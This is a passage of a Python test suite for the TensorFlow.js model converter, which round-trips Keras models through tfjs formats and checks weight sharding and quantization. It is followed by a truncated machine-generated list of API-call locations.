ConvertTfKerasSavedModelTest(tf.test.TestCase): def setUp(self): super(ConvertTfKerasSavedModelTest, self).setUp() self._tmp_dir = tempfile.mkdtemp() def tearDown(self): if os.path.isdir(self._tmp_dir): shutil.rmtree(self._tmp_dir) super(ConvertTfKerasSavedModelTest, self).tearDown() def _createSimpleSequentialModel(self): model = keras.Sequential() model.add(keras.layers.Reshape([2, 3], input_shape=[6])) model.add(keras.layers.LSTM(10)) model.add(keras.layers.Dense(1, activation='sigmoid')) return model def _createNestedSequentialModel(self): model = keras.Sequential() model.add(keras.layers.Dense(6, input_shape=[10], activation='relu')) model.add(self._createSimpleSequentialModel()) return model def _createFunctionalModelWithWeights(self): input1 = keras.Input(shape=[8]) input2 = keras.Input(shape=[10]) y = keras.layers.Concatenate()([input1, input2]) y = keras.layers.Dense(4, activation='softmax')(y) model = keras.Model([input1, input2], y) return model def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) model_json_path = os.path.join(tfjs_output_dir, 'model.json') self.assertTrue(os.path.isfile(model_json_path)) # 3. Convert the tfjs model to keras h5 format. new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'keras', model_json_path, new_h5_path]) process.communicate() self.assertEqual(0, process.returncode) self.assertTrue(os.path.isfile(new_h5_path)) # 4. Load the model back and assert on the equality of the predict # results. model_prime = keras.models.load_model(new_h5_path) new_y = model_prime.predict(x) self.assertAllClose(y, new_y) def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x1 = np.random.randn(4, 8) x2 = np.random.randn(4, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createFunctionalModelWithWeights() y = model.predict([x1, x2]) keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Use explicit --output_format value: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) model_json_path = os.path.join(tfjs_output_dir, 'model.json') self.assertTrue(os.path.isfile(model_json_path)) # 3. Convert the tfjs model to keras h5 format. new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'keras', model_json_path, new_h5_path]) process.communicate() self.assertEqual(0, process.returncode) self.assertTrue(os.path.isfile(new_h5_path)) # 4. Load the model back and assert on the equality of the predict # results. model_prime = keras.models.load_model(new_h5_path) new_y = model_prime.predict([x1, x2]) self.assertAllClose(y, new_y) def testUsingIncorrectKerasSavedModelRaisesError(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Use incorrect --input_format value: keras process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'keras', self._tmp_dir, tfjs_output_dir ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertIn( b'Expected path to point to an HDF5 file, ' b'but it points to a directory', tf.compat.as_bytes(stderr)) def testConvertTfjsLayersModelIntoShardedWeights(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) weights = model.get_weights() total_weight_bytes = sum(np.size(w) for w in weights) * 4 keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs_layers_model format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tfjs_layers_model to another tfjs_layers_model, # with sharded weights. weight_shard_size_bytes = int(total_weight_bytes * 0.3) # Due to the shard size, there ought to be 4 shards after conversion. sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'tfjs_layers_model', '--weight_shard_size_bytes', str(weight_shard_size_bytes), os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 4. Check the sharded weight files and their sizes. weight_files = sorted( glob.glob(os.path.join(sharded_model_dir, 'group*.bin'))) self.assertEqual(len(weight_files), 4) weight_file_sizes = [os.path.getsize(f) for f in weight_files] self.assertEqual(sum(weight_file_sizes), total_weight_bytes) self.assertEqual(weight_file_sizes[0], weight_file_sizes[1]) self.assertEqual(weight_file_sizes[0], weight_file_sizes[2]) self.assertLess(weight_file_sizes[3], weight_file_sizes[0]) # 5. Convert the sharded tfjs_layers_model back into a keras h5 file. new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', os.path.join(sharded_model_dir, 'model.json'), new_h5_path ]) process.communicate() self.assertEqual(0, process.returncode) with tf.Graph().as_default(), tf.compat.v1.Session(): # 6. Load the keras model and check the predict() output is close to # before. new_model = keras.models.load_model(new_h5_path) new_y = new_model.predict(x) self.assertAllClose(new_y, y) def testConvertTfjsLayersModelWithQuantization(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) weights = model.get_weights() total_weight_bytes = sum(np.size(w) for w in weights) * 4 keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs_layers_model format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tfjs_layers_model to another tfjs_layers_model, # with uint16 quantization. weight_shard_size_bytes = int(total_weight_bytes * 0.3) # Due to the shard size, there ought to be 4 shards after conversion. sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'tfjs_layers_model', '--quantization_bytes', '2', os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 4. Check the quantized weight file and its size. weight_files = sorted( glob.glob(os.path.join(sharded_model_dir, 'group*.bin'))) self.assertEqual(len(weight_files), 1) weight_file_size = os.path.getsize(weight_files[0]) # The size of the weight file should reflect the uint16 quantization. self.assertEqual(weight_file_size, total_weight_bytes // 2) def testConvertTfjsLayersModelToTfjsGraphModel(self): x = np.random.randn(8, 10) # 1. Create a model for testing. model = keras.Sequential() model.add(keras.layers.Dense(10, activation='relu', input_shape=[4])) model.add(keras.layers.Dense(1, activation='sigmoid')) h5_path = os.path.join(self._tmp_dir, 'model.h5') model.save(h5_path) # 2. Convert the keras saved model to tfjs_layers_model format. layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, layers_model_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tfjs_layers_model to another tfjs_graph_model. graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'tfjs_graph_model', os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 4. Check the model.json and weight file and its size. self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json'))) weight_files = sorted( glob.glob(os.path.join(graph_model_dir, 'group*.bin'))) self.assertEqual(len(weight_files), 1) if __name__ == '__main__': tf.test.main()
[((57, 17, 57, 42), 'tensorflow.keras.layers.Input', 'keras.layers.Input', ({(57, 36, 57, 41): '(3,)'}, {}), '((3,))', False, 'from tensorflow import keras\n'), ((69, 10, 69, 69), 'tensorflow.keras.models.Model', 'keras.models.Model', (), '', False, 'from tensorflow import keras\n'), ((81, 10, 81, 20), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((118, 15, 118, 50), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((119, 9, 119, 33), 'tensorflow.python.training.tracking.tracking.AutoTrackable', 'tracking.AutoTrackable', ({}, {}), '()', False, 'from tensorflow.python.training.tracking import tracking\n'), ((120, 12, 120, 34), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', ({(120, 31, 120, 33): '3.0'}, {}), '(3.0)', False, 'from tensorflow.python.ops import variables\n'), ((121, 12, 121, 34), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', ({(121, 31, 121, 33): '2.0'}, {}), '(2.0)', False, 'from tensorflow.python.ops import variables\n'), ((122, 11, 122, 65), 'tensorflow.python.eager.def_function.function', 'def_function.function', ({(122, 33, 122, 64): 'lambda x: root.v1 * root.v2 * x'}, {}), '(lambda x: root.v1 * root.v2 * x)', False, 'from tensorflow.python.eager import def_function\n'), ((125, 2, 125, 32), 'tensorflow.python.saved_model.save.save', 'save', ({(125, 7, 125, 11): 'root', (125, 13, 125, 22): 'save_path', (125, 24, 125, 31): 'to_save'}, {}), '(root, save_path, to_save)', False, 'from tensorflow.python.saved_model.save import save\n'), ((139, 10, 139, 20), 'tensorflow.Graph', 'tf.Graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((873, 2, 873, 16), 'tensorflow.test.main', 'tf.test.main', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((58, 11, 63, 35), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((64, 11, 68, 35), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((136, 8, 136, 31), 'tensorflow.Variable', 'tf.Variable', ({(136, 20, 136, 30): '[2.0, 4.0]'}, {}), '([2.0, 4.0])', True, 'import tensorflow as tf\n'), ((137, 8, 137, 50), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', (), '', True, 'import tensorflow as tf\n'), ((138, 4, 138, 44), 'tensorflow_hub.add_signature', 'hub.add_signature', (), '', True, 'import tensorflow_hub as hub\n'), ((141, 11, 141, 51), 'tensorflow_hub.create_module_spec', 'hub.create_module_spec', ({(141, 34, 141, 50): 'double_module_fn'}, {}), '(double_module_fn)', True, 'import tensorflow_hub as hub\n'), ((142, 8, 142, 24), 'tensorflow_hub.Module', 'hub.Module', ({(142, 19, 142, 23): 'spec'}, {}), '(spec)', True, 'import tensorflow_hub as hub\n'), ((144, 7, 144, 40), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', (), '', True, 'import tensorflow as tf\n'), ((153, 24, 153, 42), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((154, 29, 154, 78), 'os.path.join', 'os.path.join', ({(154, 42, 154, 59): 'cls.class_tmp_dir', (154, 61, 154, 77): '"""tf_saved_model"""'}, {}), "(cls.class_tmp_dir, 'tf_saved_model')", False, 'import os\n'), ((155, 32, 156, 55), 'os.path.join', 'os.path.join', ({(156, 16, 156, 33): 'cls.class_tmp_dir', (156, 35, 156, 54): '"""tf_saved_model_v1"""'}, {}), "(cls.class_tmp_dir, 'tf_saved_model_v1')", False, 'import os\n'), ((159, 28, 159, 76), 'os.path.join', 'os.path.join', ({(159, 41, 159, 58): 'cls.class_tmp_dir', (159, 60, 159, 75): '"""tf_hub_module"""'}, {}), "(cls.class_tmp_dir, 'tf_hub_module')", False, 'import os\n'), ((164, 4, 164, 36), 'shutil.rmtree', 'shutil.rmtree', ({(164, 18, 164, 35): 'cls.class_tmp_dir'}, {}), '(cls.class_tmp_dir)', False, 'import shutil\n'), ((174, 20, 174, 38), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((178, 7, 178, 35), 'os.path.isdir', 'os.path.isdir', ({(178, 21, 178, 34): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((249, 14, 255, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((261, 14, 266, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((396, 17, 396, 44), 'os.path.join', 'os.path.join', ({(396, 30, 396, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((397, 14, 401, 6), 'subprocess.Popen', 'subprocess.Popen', ({(397, 31, 401, 5): "['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,\n output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_v1_dir, output_dir])", False, 'import subprocess\n'), ((419, 17, 419, 44), 'os.path.join', 'os.path.join', ({(419, 30, 419, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((420, 14, 423, 6), 'subprocess.Popen', 'subprocess.Popen', ({(420, 31, 423, 5): "['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])", False, 'import subprocess\n'), ((444, 17, 444, 44), 'os.path.join', 'os.path.join', ({(444, 30, 444, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((445, 14, 449, 6), 'subprocess.Popen', 'subprocess.Popen', ({(445, 31, 449, 5): "['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_dir, output_dir])", False, 'import subprocess\n'), ((482, 17, 482, 44), 'os.path.join', 'os.path.join', ({(482, 30, 482, 43): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((483, 14, 486, 6), 'subprocess.Popen', 'subprocess.Popen', ({(483, 31, 486, 5): "['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])", False, 'import subprocess\n'), ((509, 14, 509, 65), 'os.path.join', 'os.path.join', ({(509, 27, 509, 40): 'self._tmp_dir', (509, 42, 509, 52): '"""keras_h5"""', (509, 54, 509, 64): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((515, 14, 518, 6), 'subprocess.Popen', 'subprocess.Popen', ({(515, 31, 518, 5): "['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((523, 18, 523, 59), 'os.path.join', 'os.path.join', ({(523, 31, 523, 44): 'self._tmp_dir', (523, 46, 523, 58): '"""model_2.h5"""'}, {}), "(self._tmp_dir, 'model_2.h5')", False, 'import os\n'), ((541, 14, 541, 65), 'os.path.join', 'os.path.join', ({(541, 27, 541, 40): 'self._tmp_dir', (541, 42, 541, 52): '"""keras_h5"""', (541, 54, 541, 64): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((547, 14, 550, 6), 'subprocess.Popen', 'subprocess.Popen', ({(547, 31, 550, 5): "['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((562, 14, 565, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((572, 14, 575, 31), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((587, 20, 587, 38), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((590, 7, 590, 35), 'os.path.isdir', 'os.path.isdir', ({(590, 21, 590, 34): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import os\n'), ((595, 12, 595, 30), 'tensorflow.keras.Sequential', 'keras.Sequential', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((602, 12, 602, 30), 'tensorflow.keras.Sequential', 'keras.Sequential', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((608, 13, 608, 35), 'tensorflow.keras.Input', 'keras.Input', (), '', False, 'from tensorflow import keras\n'), ((609, 13, 609, 36), 'tensorflow.keras.Input', 'keras.Input', (), '', False, 'from tensorflow import keras\n'), ((612, 12, 612, 44), 'tensorflow.keras.Model', 'keras.Model', ({(612, 24, 612, 40): '[input1, input2]', (612, 42, 612, 43): 'y'}, {}), '([input1, input2], y)', False, 'from tensorflow import keras\n'), ((835, 8, 835, 30), 'numpy.random.randn', 'np.random.randn', ({(835, 24, 835, 25): '8', (835, 27, 835, 29): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((838, 12, 838, 30), 'tensorflow.keras.Sequential', 'keras.Sequential', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((842, 14, 842, 53), 'os.path.join', 'os.path.join', ({(842, 27, 842, 40): 'self._tmp_dir', (842, 42, 842, 52): '"""model.h5"""'}, {}), "(self._tmp_dir, 'model.h5')", False, 'import os\n'), ((846, 30, 846, 72), 'os.path.join', 'os.path.join', ({(846, 43, 846, 56): 'self._tmp_dir', (846, 58, 846, 71): '"""tfjs_layers"""'}, {}), "(self._tmp_dir, 'tfjs_layers')", False, 'import os\n'), ((848, 14, 851, 6), 'subprocess.Popen', 'subprocess.Popen', ({(848, 31, 851, 5): "['tensorflowjs_converter', '--input_format', 'keras', h5_path,\n layers_model_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, layers_model_output_dir])", False, 'import subprocess\n'), ((856, 22, 856, 63), 'os.path.join', 'os.path.join', ({(856, 35, 856, 48): 'self._tmp_dir', (856, 50, 856, 62): '"""tfjs_graph"""'}, {}), "(self._tmp_dir, 'tfjs_graph')", False, 'import os\n'), ((83, 9, 83, 44), 'tensorflow.compat.v1.name_scope', 'tf.compat.v1.name_scope', ({(83, 33, 83, 43): 'name_scope'}, {}), '(name_scope)', True, 'import tensorflow as tf\n'), ((84, 10, 84, 60), 'tensorflow.compat.v1.constant', 'tf.compat.v1.constant', ({(84, 32, 84, 59): '[[37.0, -23.0], [1.0, 4.0]]'}, {}), '([[37.0, -23.0], [1.0, 4.0]])', True, 'import tensorflow as tf\n'), ((85, 10, 85, 54), 'tensorflow.compat.v1.get_variable', 'tf.compat.v1.get_variable', (), '', True, 'import tensorflow as tf\n'), ((86, 10, 86, 35), 'tensorflow.compat.v1.matmul', 'tf.compat.v1.matmul', ({(86, 30, 86, 31): 'x', (86, 33, 86, 34): 'w'}, {}), '(x, w)', True, 'import tensorflow as tf\n'), ((87, 15, 87, 41), 'tensorflow.compat.v1.nn.softmax', 'tf.compat.v1.nn.softmax', ({(87, 39, 87, 40): 'y'}, {}), '(y)', True, 'import tensorflow as tf\n'), ((91, 16, 91, 77), 'tensorflow.compat.v1.saved_model.builder.SavedModelBuilder', 'tf.compat.v1.saved_model.builder.SavedModelBuilder', ({(91, 67, 91, 76): 'save_path'}, {}), '(save_path)', True, 'import tensorflow as tf\n'), ((145, 13, 145, 56), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((179, 6, 179, 34), 'shutil.rmtree', 'shutil.rmtree', ({(179, 20, 179, 33): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import shutil\n'), ((183, 24, 183, 51), 'tensorflowjs.__version__.count', 'tfjs.__version__.count', ({(183, 47, 183, 50): '"""."""'}, {}), "('.')", True, 'import tensorflowjs as tfjs\n'), ((190, 6, 190, 60), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', ({(190, 39, 190, 44): 'model', (190, 46, 190, 59): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', True, 'import tensorflowjs as tfjs\n'), ((227, 34, 227, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((230, 6, 230, 61), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', ({(230, 39, 230, 45): 'model1', (230, 47, 230, 60): 'self._tmp_dir'}, {}), '(model1, self._tmp_dir)', True, 'import tensorflowjs as tfjs\n'), ((233, 34, 233, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((258, 37, 258, 63), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(258, 56, 258, 62): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((269, 33, 269, 59), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(269, 52, 269, 58): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((272, 34, 272, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((275, 16, 275, 67), 'os.path.join', 'os.path.join', ({(275, 29, 275, 42): 'self._tmp_dir', (275, 44, 275, 54): '"""keras_h5"""', (275, 56, 275, 66): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((278, 16, 281, 8), 'subprocess.Popen', 'subprocess.Popen', ({(278, 33, 281, 7): "['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((326, 34, 326, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((329, 16, 329, 67), 'os.path.join', 'os.path.join', ({(329, 29, 329, 42): 'self._tmp_dir', (329, 44, 329, 54): '"""keras_h5"""', (329, 56, 329, 66): '"""model.h5"""'}, {}), "(self._tmp_dir, 'keras_h5', 'model.h5')", False, 'import os\n'), ((332, 16, 335, 8), 'subprocess.Popen', 'subprocess.Popen', ({(332, 33, 335, 7): "['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir]"}, {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir])", False, 'import subprocess\n'), ((393, 8, 393, 34), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(393, 27, 393, 33): 'stderr'}, {}), '(stderr)', True, 'import tensorflow as tf\n'), ((508, 16, 508, 55), 'os.path.join', 'os.path.join', ({(508, 29, 508, 42): 'self._tmp_dir', (508, 44, 508, 54): '"""keras_h5"""'}, {}), "(self._tmp_dir, 'keras_h5')", False, 'import os\n'), ((510, 34, 510, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((533, 34, 533, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((534, 16, 534, 52), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(534, 40, 534, 51): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((540, 16, 540, 55), 'os.path.join', 'os.path.join', ({(540, 29, 540, 42): 'self._tmp_dir', (540, 44, 540, 54): '"""keras_h5"""'}, {}), "(self._tmp_dir, 'keras_h5')", False, 'import os\n'), ((542, 34, 542, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((555, 34, 555, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((569, 8, 569, 64), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(569, 27, 569, 63): "('tensorflowjs %s' % tfjs.__version__)"}, {}), "('tensorflowjs %s' % tfjs.__version__)", True, 'import tensorflow as tf\n'), ((570, 8, 570, 34), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(570, 27, 570, 33): 'stdout'}, {}), '(stdout)', True, 'import tensorflow as tf\n'), ((579, 8, 579, 64), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(579, 27, 579, 63): "('tensorflowjs %s' % tfjs.__version__)"}, {}), "('tensorflowjs %s' % tfjs.__version__)", True, 'import tensorflow as tf\n'), ((580, 8, 580, 34), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ({(580, 27, 580, 33): 'stdout'}, {}), '(stdout)', True, 'import tensorflow as tf\n'), ((591, 6, 591, 34), 'shutil.rmtree', 'shutil.rmtree', ({(591, 20, 591, 33): 'self._tmp_dir'}, {}), '(self._tmp_dir)', False, 'import shutil\n'), ((596, 14, 596, 59), 'tensorflow.keras.layers.Reshape', 'keras.layers.Reshape', (), '', False, 'from tensorflow import keras\n'), ((597, 14, 597, 35), 'tensorflow.keras.layers.LSTM', 'keras.layers.LSTM', ({(597, 32, 597, 34): '(10)'}, {}), '(10)', False, 'from tensorflow import keras\n'), ((598, 14, 598, 57), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((603, 14, 603, 72), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((610, 8, 610, 34), 'tensorflow.keras.layers.Concatenate', 'keras.layers.Concatenate', ({}, {}), '()', False, 'from tensorflow import keras\n'), ((611, 8, 611, 51), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (), '', False, 'from tensorflow import keras\n'), ((616, 34, 616, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((617, 10, 617, 32), 'numpy.random.randn', 'np.random.randn', ({(617, 26, 617, 27): '8', (617, 29, 617, 31): '10'}, {}), '(8, 10)', True, 'import numpy as np\n'), ((624, 6, 624, 65), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', ({(624, 44, 624, 49): 'model', (624, 51, 624, 64): 'self._tmp_dir'}, {}), '(model, self._tmp_dir)', False, 'from tensorflow import keras\n'), ((627, 24, 627, 59), 'os.path.join', 'os.path.join', ({(627, 37, 627, 50): 'self._tmp_dir', (627, 52, 627, 58): '"""tfjs"""'}, {}), "(self._tmp_dir, 'tfjs')", False, 'import os\n'), ((629, 16, 632, 8), 'subprocess.Popen', 'subprocess.Popen', ({(629, 33, 632, 7): "['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])", False, 'import subprocess\n'), ((636, 24, 636, 67), 'os.path.join', 'os.path.join', ({(636, 37, 636, 52): 'tfjs_output_dir', (636, 54, 636, 66): '"""model.json"""'}, {}), "(tfjs_output_dir, 'model.json')", False, 'import os\n'), ((640, 20, 640, 60), 'os.path.join', 'os.path.join', ({(640, 33, 640, 46): 'self._tmp_dir', (640, 48, 640, 59): '"""new_h5.h5"""'}, {}), "(self._tmp_dir, 'new_h5.h5')", False, 'import os\n'), ((641, 16, 643, 68), 'subprocess.Popen', 'subprocess.Popen', ({(641, 33, 643, 67): "['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"}, {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])", False, 'import subprocess\n'), ((651, 20, 651, 56), 'tensorflow.keras.models.load_model', 'keras.models.load_model', ({(651, 44, 651, 55): 'new_h5_path'}, {}), '(new_h5_path)', False, 'from tensorflow import keras\n'), ((656, 34, 656, 56), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((657, 11, 657, 32), 'numpy.random.randn', 'np.random.randn', ({(657, 27, 657, 28): '4', (657, 30, 657, 31): '8'}, {}), '(4, 8)', True, 'import numpy as np\n'), 